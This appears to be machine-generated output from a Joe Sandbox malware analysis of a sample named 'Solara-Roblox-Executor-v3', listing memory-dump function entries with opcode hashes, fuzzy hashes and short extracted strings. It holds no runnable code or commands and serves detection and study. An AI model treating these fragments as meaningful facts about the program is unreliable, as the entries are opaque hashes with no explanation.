                                                                                          • Snapshot File: hcaresult_6_2_400000_Solara-Roblox-Executor-v3.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: (%$i` [${PY_
                                                                                          • API String ID: 0-690263851
                                                                                          • Opcode ID: d864e012e642d7019a3f652b36d1fcbf554507e9d811b4c6a54bc9a8b232019c
                                                                                          • Instruction ID: 0a23c193bc53a9e4a44044f81f6f0e042422c9edda70d41b8211f96d6637d2ed
                                                                                          • Opcode Fuzzy Hash: d864e012e642d7019a3f652b36d1fcbf554507e9d811b4c6a54bc9a8b232019c
                                                                                          • Instruction Fuzzy Hash: 59F06D302083828AC305CF39A9A486BFFE4DB97664F641E2DA592D72D1C634C50687AA
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.2145098110.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_400000_Solara-Roblox-Executor-v3.jbxd
                                                                                          Similarity
                                                                                          • API ID: InitializeThunk
                                                                                          • String ID: PZ[X$L4
                                                                                          • API String ID: 2994545307-2332103679
                                                                                          • Opcode ID: 87bb8333028b02e84959bb826c8766ce2e404ac98ad40eed4c6ac53b4e33a90f
                                                                                          • Instruction ID: 49bc7c50038655529f9995de5aa6b73d8f67cd56c256462bcf22c1ae3a81906e
                                                                                          • Opcode Fuzzy Hash: 87bb8333028b02e84959bb826c8766ce2e404ac98ad40eed4c6ac53b4e33a90f
                                                                                          • Instruction Fuzzy Hash: 47B107766083528BD7288F28DC917BFB3E1EFC5314F15883DE58A97291EB78A841C785
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.2145098110.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_400000_Solara-Roblox-Executor-v3.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: _$vw
                                                                                          • API String ID: 0-366109380
                                                                                          • Opcode ID: 54e5d649cd2e4692caf1deba0cdb3e0e9d9c888294efb2b2f3bd66271a1b0bd0
                                                                                          • Instruction ID: 7f8a6c08207e33933c48c22497a2f9278b244ce11f01d9e00712ae9ff2e0b94b
                                                                                          • Opcode Fuzzy Hash: 54e5d649cd2e4692caf1deba0cdb3e0e9d9c888294efb2b2f3bd66271a1b0bd0
                                                                                          • Instruction Fuzzy Hash: 297155B16083048BC714EF25E89276BBBF1EFD1354F988A2DE4C18B391E7789505CB4A
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.2145098110.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_400000_Solara-Roblox-Executor-v3.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: MKO$O
                                                                                          • API String ID: 0-1176093571
                                                                                          • Opcode ID: 8d33f979c90a24fca7a00c12b245d059880a234b0252b8d5dab52824876b7727
                                                                                          • Instruction ID: 0ae20e86b8a161806dee4b124e76371130a3ba0685868e5c34c1fb5f652fb9a7
                                                                                          • Opcode Fuzzy Hash: 8d33f979c90a24fca7a00c12b245d059880a234b0252b8d5dab52824876b7727
                                                                                          • Instruction Fuzzy Hash: AA71186120C3828BD3198F3984A077BFFE19FA3214F18597DE4D297382D77D8909875A
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.2145098110.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_400000_Solara-Roblox-Executor-v3.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: DRIP$X^D\
                                                                                          • API String ID: 0-91992238
                                                                                          • Opcode ID: 68f0531f6d0b959cce85cae1e16b2e600bfa4373815b459f54189735d722ece8
                                                                                          • Instruction ID: d79ac7cf482df1d01abe62a05940d775e2eb21aa50623c3bbd7bf635fb37306d
                                                                                          • Opcode Fuzzy Hash: 68f0531f6d0b959cce85cae1e16b2e600bfa4373815b459f54189735d722ece8
                                                                                          • Instruction Fuzzy Hash: B201C42432C7A0CBD7118F285490767AFE25BC3754FB8196DD4D59B352C2298C06CB8A
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.2145098110.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_400000_Solara-Roblox-Executor-v3.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: 25B
                                                                                          • API String ID: 0-3796699878
                                                                                          • Opcode ID: d150d074dd6b2455100738e6367b80a590ac1a0779f213c14122994e8a6a1064
                                                                                          • Instruction ID: 405674f7bc34d0ea812f454e3d689863d38b7e88d6049d5d0e29b99367aebabd
                                                                                          • Opcode Fuzzy Hash: d150d074dd6b2455100738e6367b80a590ac1a0779f213c14122994e8a6a1064
                                                                                          • Instruction Fuzzy Hash: 8B321176A04212CFDB18CF68DC916BE73B2FB89311F1A81B9D802A73A5D7389D51CB54
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.2145098110.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_400000_Solara-Roblox-Executor-v3.jbxd
                                                                                          Similarity
                                                                                          • API ID: InitializeThunk
                                                                                          • String ID: f
                                                                                          • API String ID: 2994545307-1993550816
                                                                                          • Opcode ID: bd47dde1f40b33a1fab791ec94e6ff0b794a6c620c0205e332e95bf2a5364547
                                                                                          • Instruction ID: b828f4544e9affbb4f8d631a5f2a1d6666d2d51da9564fba8a58fa6a7736e310
                                                                                          • Opcode Fuzzy Hash: bd47dde1f40b33a1fab791ec94e6ff0b794a6c620c0205e332e95bf2a5364547
                                                                                          • Instruction Fuzzy Hash: 2812F4716083118BD714CF24C89076FBBE2EBC9324F289A2EE6D597391D738D8458BD6
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.2145098110.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_400000_Solara-Roblox-Executor-v3.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: |
                                                                                          • API String ID: 0-2343686810
                                                                                          • Opcode ID: 4cde0023bf0bf93d460d1c58ce94bf8605f05d85e5f6a093473c425404ce049f
                                                                                          • Instruction ID: fd3997e13e197f00a57f2f26a6d9b4531a04cd8dfd78d516a4d3cdb692330be1
                                                                                          • Opcode Fuzzy Hash: 4cde0023bf0bf93d460d1c58ce94bf8605f05d85e5f6a093473c425404ce049f
                                                                                          • Instruction Fuzzy Hash: CBD1353564C3418BD728CF39C8913ABBBE2AFD6314F18892EE4D997391DB389845C746
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.2145098110.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_400000_Solara-Roblox-Executor-v3.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: @A
                                                                                          • API String ID: 0-2960862460
                                                                                          • Opcode ID: 950c1b8af1eaac46aae3cda4d5f298d263ae63ec9d441d0849551497eed8f4b5
                                                                                          • Instruction ID: 3a322d5aa285781219aea204ca36b90a866ebcf7f7c98695be16e6dee4ec5bc0
                                                                                          • Opcode Fuzzy Hash: 950c1b8af1eaac46aae3cda4d5f298d263ae63ec9d441d0849551497eed8f4b5
                                                                                          • Instruction Fuzzy Hash: 9ED1123E528311CBCB189F28D85117BB7A2FF4A751F0B887DD5814B2A0EB3A8952C755
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.2145098110.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_400000_Solara-Roblox-Executor-v3.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: uw
                                                                                          • API String ID: 0-2711446736
                                                                                          • Opcode ID: 812dabfa2fe8249c667140d2480eeaa38e923c29aaf17f2c61fccdb37c18cdef
                                                                                          • Instruction ID: e72cbe22eef0dd791d4b7d4f7a5d27603352ff7668c6b160e8c84b58288f8a9d
                                                                                          • Opcode Fuzzy Hash: 812dabfa2fe8249c667140d2480eeaa38e923c29aaf17f2c61fccdb37c18cdef
                                                                                          • Instruction Fuzzy Hash: 57A156B16043119BD710DF24DC81B6BB3A1FF94314F14892EF98A8B391E778E905C796
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.2145098110.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_400000_Solara-Roblox-Executor-v3.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: L4
                                                                                          • API String ID: 0-282083451
                                                                                          • Opcode ID: 79b5eb087dd7f1f3435b92eb2687bb2369e45fd830a936d407f16e20e03f05ea
                                                                                          • Instruction ID: c34a2a58ddc122c53d27d8cfeb424a434aaa89fb15086263f759e7bc79f4742b
                                                                                          • Opcode Fuzzy Hash: 79b5eb087dd7f1f3435b92eb2687bb2369e45fd830a936d407f16e20e03f05ea
                                                                                          • Instruction Fuzzy Hash: 8AA12A7260C2528FD724CF28D4A17ABB7E2ABD5314F15893EE4DA87382DA34EC45CB45
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.2145098110.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_400000_Solara-Roblox-Executor-v3.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: vZA
                                                                                          • API String ID: 0-4004645160
                                                                                          • Opcode ID: 13b8d5055627cfcfc1dafa37139e628654c647c8657d1170860fa58ccbf77abd
                                                                                          • Instruction ID: f9d1d9ee12f03e56123ed2661192a81acfce358c0f116984d69733c2c3d591ec
                                                                                          • Opcode Fuzzy Hash: 13b8d5055627cfcfc1dafa37139e628654c647c8657d1170860fa58ccbf77abd
                                                                                          • Instruction Fuzzy Hash: 1B816B76508791CFD3248F38C8817FBBBE2EBC6310F29892DD4D597292DA348846CB95
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.2145098110.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_400000_Solara-Roblox-Executor-v3.jbxd
                                                                                          Similarity
                                                                                          • API ID: InitializeThunk
                                                                                          • String ID: vZA
                                                                                          • API String ID: 2994545307-4004645160
                                                                                          • Opcode ID: f42c1a96a6d5377d7f2e0dfaa9194a0fc2476c6f0d7a5de04e450a85d1cf9de9
                                                                                          • Instruction ID: 0301ba2eaba80f64e49771fcbfe0c4531ad3b70218d3c12d047cc2cf6d4005f7
                                                                                          • Opcode Fuzzy Hash: f42c1a96a6d5377d7f2e0dfaa9194a0fc2476c6f0d7a5de04e450a85d1cf9de9
                                                                                          • Instruction Fuzzy Hash: 4591E5367047504BD7348F28CC857BBB6E2EBC9324F2AC93ED5D9D7292EA3098418749
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.2145098110.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_400000_Solara-Roblox-Executor-v3.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: k
                                                                                          • API String ID: 0-140662621
                                                                                          • Opcode ID: 98266945617647bfc625732d04fab6b99e702a1ecc22344a9a87c1c7fc8e0fb1
                                                                                          • Instruction ID: 5791e815fe6cd2624d956546341e36b4c07097eda1d393422b039d9f971ed13b
                                                                                          • Opcode Fuzzy Hash: 98266945617647bfc625732d04fab6b99e702a1ecc22344a9a87c1c7fc8e0fb1
                                                                                          • Instruction Fuzzy Hash: 569134B55083519FD7208F18C49276FBBF1EF86314F54892DE5D58B392EA38E805CB4A
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.2145098110.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_400000_Solara-Roblox-Executor-v3.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: pC
                                                                                          • API String ID: 0-3243261774
                                                                                          • Opcode ID: 3f81bd3b0951d299f0445af839adc06fc0b6082c96b4b6e88ec81782c4d4f3e0
                                                                                          • Instruction ID: 1d64bfa28b4185acc1c8aa400ecd843ade2c7c2ca0c126c0d533da78a7176681
                                                                                          • Opcode Fuzzy Hash: 3f81bd3b0951d299f0445af839adc06fc0b6082c96b4b6e88ec81782c4d4f3e0
                                                                                          • Instruction Fuzzy Hash: 1461F2382092948FC3048F35D8902ABBBE3EB9A300F49887EE4D987791DB35C906CB15
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.2145098110.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_400000_Solara-Roblox-Executor-v3.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: XrA
                                                                                          • API String ID: 0-2168245352
                                                                                          • Opcode ID: 6d943a0aa7fed89fa4e81b5142dab2f0dd33ff45113573d2e2ccf0d36db65168
                                                                                          • Instruction ID: 25ae27eff3f3ac1d243a6df6d11571b51b9a22a618fb34a09c85d0d2125aacba
                                                                                          • Opcode Fuzzy Hash: 6d943a0aa7fed89fa4e81b5142dab2f0dd33ff45113573d2e2ccf0d36db65168
                                                                                          • Instruction Fuzzy Hash: 34514A71A4C35187D7288B29CC613E7B7F2EFD6310F1D856ED4D98B381E63898428746
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.2145098110.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_400000_Solara-Roblox-Executor-v3.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: m
                                                                                          • API String ID: 0-3775001192
                                                                                          • Opcode ID: 227a78e8d719c6eb118df39e5c65f60e2cb1495bcd6f4bc87d9297fda920b824
                                                                                          • Instruction ID: 861d83e90e53fffc98a9b64a8b80c363e01fb939021e35b4241f0e71cb4f6f9e
                                                                                          • Opcode Fuzzy Hash: 227a78e8d719c6eb118df39e5c65f60e2cb1495bcd6f4bc87d9297fda920b824
                                                                                          • Instruction Fuzzy Hash: 65516B76A593419BE3308F25DC467ABB6E2EBC1304F18893EE98893251DA395D058B86
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.2145098110.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_400000_Solara-Roblox-Executor-v3.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: ;joh
                                                                                          • API String ID: 0-3793907784
                                                                                          • Opcode ID: 9785efcf7558105071ba36050dcb2f19a5dbd97bde5d09413a6135ff73efbfbd
                                                                                          • Instruction ID: 8ffd483ffe66407f984db089c0a959bc8aa016e12d74a43f550b4d5db4991717
                                                                                          • Opcode Fuzzy Hash: 9785efcf7558105071ba36050dcb2f19a5dbd97bde5d09413a6135ff73efbfbd
                                                                                          • Instruction Fuzzy Hash: 82213775A092108BC710BF25BC8106BB3E4DF92324F45083EF9C287292E639A4258B1B
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.2145098110.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_400000_Solara-Roblox-Executor-v3.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: f59257bfb213a6ea261c930a839d380230a1575dff23625d49938fe93cf6fba1
                                                                                          • Instruction ID: bd56c610aac472dacfa456dd98cf8d0a7e8ee7f0f7949810c19790630cd9a0f1
                                                                                          • Opcode Fuzzy Hash: f59257bfb213a6ea261c930a839d380230a1575dff23625d49938fe93cf6fba1
                                                                                          • Instruction Fuzzy Hash: 3622B372A087118BC725DE18D9806ABB3E1FFC4319F19893ED986A7385D738B815CB47
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.2145098110.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_400000_Solara-Roblox-Executor-v3.jbxd
                                                                                          Similarity
                                                                                          • API ID: InitializeThunk
                                                                                          • String ID:
                                                                                          • API String ID: 2994545307-0
                                                                                          • Opcode ID: 66425b946a06d4050dd5440c1168a7114e64d0220f4ac06e1f8f511980b602d5
                                                                                          • Instruction ID: dec404e15bb8dc3cabf0ac9761b7cd40cf2e58a9b4aeaeca4b92df2f9fe2dbcb
                                                                                          • Opcode Fuzzy Hash: 66425b946a06d4050dd5440c1168a7114e64d0220f4ac06e1f8f511980b602d5
                                                                                          • Instruction Fuzzy Hash: 3CC166716083104BD724CF25CD8163FF7A2EBCA718F14692EF48567391DA39EC06879A
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.2145098110.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_400000_Solara-Roblox-Executor-v3.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: d9ea95c158cf5fe4e1c6afcf3ad7a96f4e71b2de22238e8511255d1fd545b091
                                                                                          • Instruction ID: d0ebca6db4d6d11834990b0b9525ebe66ae7da078b46021663113346224e1f62
                                                                                          • Opcode Fuzzy Hash: d9ea95c158cf5fe4e1c6afcf3ad7a96f4e71b2de22238e8511255d1fd545b091
                                                                                          • Instruction Fuzzy Hash: 76914479608301DFEB149F15E8417BFB7A2FBC6314F05083EE585132A2D739A956CB8A
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.2145098110.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_400000_Solara-Roblox-Executor-v3.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 0226264b3b0475b6b8f41913e1bb1e0e2e4314843019dc07a5c0d8939cde22bd
                                                                                          • Instruction ID: 32ace9cc5288d546b1f05e36ee7d838c7c8a4eea2395ecc4371e8b9e847046d8
                                                                                          • Opcode Fuzzy Hash: 0226264b3b0475b6b8f41913e1bb1e0e2e4314843019dc07a5c0d8939cde22bd
                                                                                          • Instruction Fuzzy Hash: 68513A76A0C3654BD308CE29A89062BB7D2D7CE260F1AA93ED4A1C73C1D67C8C069745
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.2145098110.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_400000_Solara-Roblox-Executor-v3.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 69d341907e5d1c876463b0995d5702560af30785f2fdc26ede0bbe9352396c83
                                                                                          • Instruction ID: 2f9b7cec203dc5887a5ad9a703a881c7e18b8b4b24f2af3de7fe9f26cd3bf34d
                                                                                          • Opcode Fuzzy Hash: 69d341907e5d1c876463b0995d5702560af30785f2fdc26ede0bbe9352396c83
                                                                                          • Instruction Fuzzy Hash: 6A515835B443114BDB2C8A29CCA537FBBE2EBC9320F14952EE5D587391E6389C51C786
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.2145098110.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_400000_Solara-Roblox-Executor-v3.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: cf4250b2b93df790e5e465d348d8a83d9dde9621fe55ed2acdcabfd21b7744ba
                                                                                          • Instruction ID: 6f94ba384be2c262bb28aa4e7449259316b8352a2d70bedb04b72604ba626479
                                                                                          • Opcode Fuzzy Hash: cf4250b2b93df790e5e465d348d8a83d9dde9621fe55ed2acdcabfd21b7744ba
                                                                                          • Instruction Fuzzy Hash: 165103B420C3059BE7209F25D981B3FB7E5EB89708F00983DF98583292DB75D816D75A
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.2145098110.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_400000_Solara-Roblox-Executor-v3.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 6b6635a7d56ccd33bed45699a5fd131c25d546a79494d7c8924a4ba432fa39d0
                                                                                          • Instruction ID: b50522fe2cb7ed70975191dc4218217dddb65d0a905e41cecbe62661a19b3933
                                                                                          • Opcode Fuzzy Hash: 6b6635a7d56ccd33bed45699a5fd131c25d546a79494d7c8924a4ba432fa39d0
                                                                                          • Instruction Fuzzy Hash: 8251F0B5A483948FD3249F66984426BFBE2FBC5704F158A1CE1C45B354DBB8C806CF86
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.2145098110.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_400000_Solara-Roblox-Executor-v3.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 35238e68626c916a4472fff1307ff7c76df2c4a13534bf32289f0458eb4a601c
                                                                                          • Instruction ID: a5727348541ff3d7a9ebe3106d652229288bf4a21cf1a6f639bb09c352ee9142
                                                                                          • Opcode Fuzzy Hash: 35238e68626c916a4472fff1307ff7c76df2c4a13534bf32289f0458eb4a601c
                                                                                          • Instruction Fuzzy Hash: DC3195767043604FD324CF3CD9802ABBAD2ABC9724F1A4A2ED4D9D7351DA30D841CB89
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.2145098110.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_400000_Solara-Roblox-Executor-v3.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: ddfaccb04d8136356fd8b8992969fa8c4b28e9094eac0a04ae6e236a8315cff8
                                                                                          • Instruction ID: 233f906ac5ebf9a505ba12f712a9ea2e0bdf5b49ec8084454082a2f6121882c0
                                                                                          • Opcode Fuzzy Hash: ddfaccb04d8136356fd8b8992969fa8c4b28e9094eac0a04ae6e236a8315cff8
                                                                                          • Instruction Fuzzy Hash: 29218A31A49340ABDB119F28CC4166EB7A1EB91721F148A6FF8D4633E0D7348847C787
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.2145098110.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_400000_Solara-Roblox-Executor-v3.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: dd5d084f8aeba105c39c5887f5fececc6fe2a043df4080d6db0499556a032d33
                                                                                          • Instruction ID: 37e4388d1978ffd58c1dad855a8ec426e1f47d60b2639358f355cbf5e3a6b588
                                                                                          • Opcode Fuzzy Hash: dd5d084f8aeba105c39c5887f5fececc6fe2a043df4080d6db0499556a032d33
                                                                                          • Instruction Fuzzy Hash: 96117A367446148BD3144A1A9CC0BBBB7ABE7DE324F25A22FD2E453211E669880587E5
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.2145098110.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_400000_Solara-Roblox-Executor-v3.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 028c749e21533b641ab91f168d681706c5995d8384776552e6cfd30855e8d9c6
                                                                                          • Instruction ID: 57cd1ee36810f2ff86c1b162723dc3e83fe3fb41b353d3cb6405918fa605100d
                                                                                          • Opcode Fuzzy Hash: 028c749e21533b641ab91f168d681706c5995d8384776552e6cfd30855e8d9c6
                                                                                          • Instruction Fuzzy Hash: 74112536728521DFDB18CF20E85093BB3A2EB95351FC4882DE44663216D6309D40CBC9
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.2145098110.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_400000_Solara-Roblox-Executor-v3.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
                                                                                          • Instruction ID: eb79c2ea13a487a2f8b37539e95352bc93b8a764a1ebf09b8d11b4b0c6cbc38d
                                                                                          • Opcode Fuzzy Hash: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
                                                                                          • Instruction Fuzzy Hash: 4911E933B061D40EC3168D3D84005E5BFA31AE7234F5A639AF4B49B2D2D6269D8A9359
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.2145098110.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_400000_Solara-Roblox-Executor-v3.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 11a41cd55c36b8c37cf059e6c754260814cc8a1cd79ac80701d5382ae4533c09
                                                                                          • Instruction ID: 4d40434602527fb75b1a8814758078dc4aa516edfbf81ae9127f196bbad4f78e
                                                                                          • Opcode Fuzzy Hash: 11a41cd55c36b8c37cf059e6c754260814cc8a1cd79ac80701d5382ae4533c09
                                                                                          • Instruction Fuzzy Hash: E6019EB1B0031147D620DE55A4C172BA2A96B81708F48443EEC0457342DB7EFC25C6AF
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.2145098110.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_400000_Solara-Roblox-Executor-v3.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 0f3f5a9a947cd2f51a9ca2798e5224c34a83f88a978d860e7ab2107b3778c8a3
                                                                                          • Instruction ID: 3b54dafdd60cb9998b17963ff08630d60bcd28773f36e83821d069ea7fbf14f2
                                                                                          • Opcode Fuzzy Hash: 0f3f5a9a947cd2f51a9ca2798e5224c34a83f88a978d860e7ab2107b3778c8a3
                                                                                          • Instruction Fuzzy Hash: 5B1191B85193528BD708CF11C46027FF7E1BFD6305F59AA6DE0C6B7284DB38850A8785
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.2145098110.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_400000_Solara-Roblox-Executor-v3.jbxd
                                                                                          Similarity
                                                                                          • API ID: InitializeThunk
                                                                                          • String ID:
                                                                                          • API String ID: 2994545307-0
